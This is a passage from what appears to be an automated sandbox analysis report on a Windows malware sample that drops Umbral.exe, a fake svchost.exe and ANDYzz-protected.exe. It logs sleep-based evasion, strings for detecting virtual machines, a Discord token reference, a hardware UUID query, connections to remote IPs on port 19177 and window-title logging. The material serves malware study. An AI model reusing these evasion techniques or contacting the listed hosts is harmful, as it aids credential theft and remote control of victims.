              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Thread delayed: delay time: 597955
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Thread delayed: delay time: 597828
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Thread delayed: delay time: 597716
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Thread delayed: delay time: 597608
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Thread delayed: delay time: 597500
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Thread delayed: delay time: 597390
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Thread delayed: delay time: 597275
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Thread delayed: delay time: 597170
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Thread delayed: delay time: 597061
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Thread delayed: delay time: 596923
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Thread delayed: delay time: 596797
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Thread delayed: delay time: 596672
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Thread delayed: delay time: 596560
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Thread delayed: delay time: 596451
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Thread delayed: delay time: 596343
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Thread delayed: delay time: 596233
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Thread delayed: delay time: 596125
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Thread delayed: delay time: 595907
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Thread delayed: delay time: 595780
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Thread delayed: delay time: 595672
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Thread delayed: delay time: 595553
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Thread delayed: delay time: 595422
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Thread delayed: delay time: 595312
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Thread delayed: delay time: 595201
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Thread delayed: delay time: 595093
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Thread delayed: delay time: 594984
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Thread delayed: delay time: 594867
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Thread delayed: delay time: 594750
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Thread delayed: delay time: 594640
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Thread delayed: delay time: 594530
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Thread delayed: delay time: 594422
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Thread delayed: delay time: 594312
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Thread delayed: delay time: 594193
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Window / User API: threadDelayed 475
              Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Window / User API: threadDelayed 769
              Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Window / User API: threadDelayed 5317
              Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Window / User API: threadDelayed 3214
              Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Window / User API: foregroundWindowGot 778
              Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Window / User API: foregroundWindowGot 764
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Window / User API: threadDelayed 3618
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Window / User API: threadDelayed 5963
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Window / User API: windowPlacementGot 1978
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exe TID: 6672 | Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 4944 | Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 6948 | Thread sleep count: 475 > 30
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 3004 | Thread sleep time: -30000s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 6380 | Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 7060 | Thread sleep count: 769 > 30
              Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 7060 | Thread sleep time: -76900s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 6392 | Thread sleep count: 5317 > 30
              Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 6392 | Thread sleep time: -5317000s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 6392 | Thread sleep count: 3214 > 30
              Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 6392 | Thread sleep time: -3214000s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520 | Thread sleep time: -28592453314249787s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520 | Thread sleep time: -600000s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520 | Thread sleep time: -599874s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520 | Thread sleep time: -599762s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520 | Thread sleep time: -599656s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520 | Thread sleep time: -599546s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520 | Thread sleep time: -599435s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520 | Thread sleep time: -599308s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520 | Thread sleep time: -599201s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520 | Thread sleep time: -599093s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520 | Thread sleep time: -598983s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520 | Thread sleep time: -598875s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520 | Thread sleep time: -598765s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520 | Thread sleep time: -598656s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520 | Thread sleep time: -598545s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520 | Thread sleep time: -598437s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520 | Thread sleep time: -598328s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520 | Thread sleep time: -598218s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520 | Thread sleep time: -598109s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520 | Thread sleep time: -597955s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520 | Thread sleep time: -597828s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520 | Thread sleep time: -597716s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520 | Thread sleep time: -597608s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520 | Thread sleep time: -597500s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520 | Thread sleep time: -597390s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520 | Thread sleep time: -597275s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520 | Thread sleep time: -597170s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520 | Thread sleep time: -597061s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520 | Thread sleep time: -596923s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520 | Thread sleep time: -596797s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520 | Thread sleep time: -596672s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520 | Thread sleep time: -596560s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520 | Thread sleep time: -596451s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520 | Thread sleep time: -596343s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520 | Thread sleep time: -596233s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520 | Thread sleep time: -596125s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520 | Thread sleep time: -595907s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520 | Thread sleep time: -595780s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520 | Thread sleep time: -595672s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520 | Thread sleep time: -595553s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520 | Thread sleep time: -595422s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520 | Thread sleep time: -595312s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520 | Thread sleep time: -595201s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520 | Thread sleep time: -595093s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520 | Thread sleep time: -594984s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520 | Thread sleep time: -594867s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520 | Thread sleep time: -594750s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520 | Thread sleep time: -594640s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520 | Thread sleep time: -594530s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520 | Thread sleep time: -594422s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520 | Thread sleep time: -594312s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520 | Thread sleep time: -594193s >= -30000s
              Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
              Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
              Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
              Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
              Source: Umbral.exe, 00000001.00000002.1697775557.00000253800DE000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 00000001.00000000.1642162962.00000253F8F32000.00000002.00000001.01000000.00000006.sdmp, Umbral.exe.0.dr | Binary or memory string: vboxtray
              Source: Umbral.exe.0.dr | Binary or memory string: vboxservice
              Source: Umbral.exe, 00000001.00000002.1697775557.00000253800DE000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 00000001.00000000.1642162962.00000253F8F32000.00000002.00000001.01000000.00000006.sdmp, Umbral.exe.0.dr | Binary or memory string: qemu-ga
              Source: ANDYzz-protected.exe, 00000003.00000002.4131666608.00000191DE220000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllo}
              Source: Umbral.exe.0.dr | Binary or memory string: vmwareuser
              Source: Umbral.exe, 00000001.00000002.1697775557.00000253800DE000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 00000001.00000000.1642162962.00000253F8F32000.00000002.00000001.01000000.00000006.sdmp, Umbral.exe.0.dr | Binary or memory string: vmusrvc
              Source: netsh.exe, 00000007.00000003.1671541873.00000000009D2000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 0000000A.00000003.1683144115.0000000003742000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllS
              Source: Umbral.exe.0.dr | Binary or memory string: vmwareservice+discordtokenprotector
              Source: svchost.exe, 00000002.00000002.4084254403.0000000001494000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
              Source: Umbral.exe.0.dr | Binary or memory string: vmsrvc
              Source: Umbral.exe.0.dr | Binary or memory string: vmtoolsd
              Source: Umbral.exe.0.dr | Binary or memory string: vmwaretray
              Source: KvS2rT08PQ.exe, 00000000.00000002.1649444082.00000000009DD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: Umbral.exe, 00000001.00000002.1697775557.00000253800DE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmwareservice
              Source: Umbral.exe, 00000001.00000002.1698819541.00000253F920C000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000009.00000003.1681145917.0000000000B01000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: svchost.exe, 00000002.00000002.4084198852.000000000147D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlld
              Source: C:\Windows\System32\wbem\WMIC.exe | Process information queried: ProcessInformation
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Process token adjusted: Debug
              Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Process token adjusted: Debug
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Process token adjusted: Debug
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exe | Memory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Network Connect: 3.124.142.205 19177
              Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Network Connect: 3.125.223.134 19177
              Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Network Connect: 3.125.209.94 19177
              Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Network Connect: 18.158.249.75 19177
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exe | Process created: C:\Users\user\AppData\Local\Temp\Umbral.exe "C:\Users\user\AppData\Local\Temp\Umbral.exe"
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exe | Process created: C:\Users\user\AppData\Local\Temp\svchost.exe "C:\Users\user\AppData\Local\Temp\svchost.exe"
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exe | Process created: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe "C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe"
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
              Source: svchost.exe, 00000002.00000002.4100093724.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4100093724.000000000400C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 24/04/21 | 12:20:06 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 24/04/23 | 21:16:35 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 24/04/26 | 08:01:02 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 24/04/26 | 09:43:40 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 24/04/23 | 23:11:19 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 24/04/26 | 03:47:45 - Program Manager
              Source: svchost.exe, 00000002.00000002.4100093724.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4100093724.000000000400C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 24/04/20 | 22:41:00 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 24/04/26 | 03:57:04 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 24/04/26 | 08:22:26 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 24/04/26 | 07:50:23 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 24/04/26 | 04:34:25 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 24/04/23 | 21:31:12 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 24/04/26 | 05:42:29 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 24/04/26 | 04:13:01 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 24/04/23 | 21:52:36 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 24/04/23 | 21:21:53 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 24/04/26 | 09:58:16 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 24/04/23 | 23:19:11 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 24/04/23 | 23:09:52 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 10:08:35 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 03:26:21 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:48:57 - Program Manager
              Source: svchost.exe, 00000002.00000002.4100093724.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4100093724.000000000400C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/21 | 12:38:33 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:14:31 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 06:58:25 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/21 | 13:46:37 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 22:24:39 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:06:28 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:06:19 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 19:30:26 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:35:55 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:18:18 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 22:57:43 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:34:16 - Program Manager
              Source: svchost.exe, 00000002.00000002.4100093724.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4100093724.000000000400C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/21 | 12:07:50 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:08:59 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:45:14 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:24:57 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:43:59 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 10:23:12 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:32:42 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:42:01 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:53:18 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 10:13:53 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 20:19:20 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:32:51 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:59:46 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:11:37 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:27:24 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:38:22 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 22:35:28 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 19:47:23 - Program Manager
              Source: svchost.exe, 00000002.00000002.4100093724.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4100093724.000000000400C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/21 | 13:09:06 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:53:09 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:50:32 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:19:39 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:19:48 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:45:05 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:00:57 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:02:12 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:27:33 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 03:27:51 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:35:46 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:10:16 - Program Manager
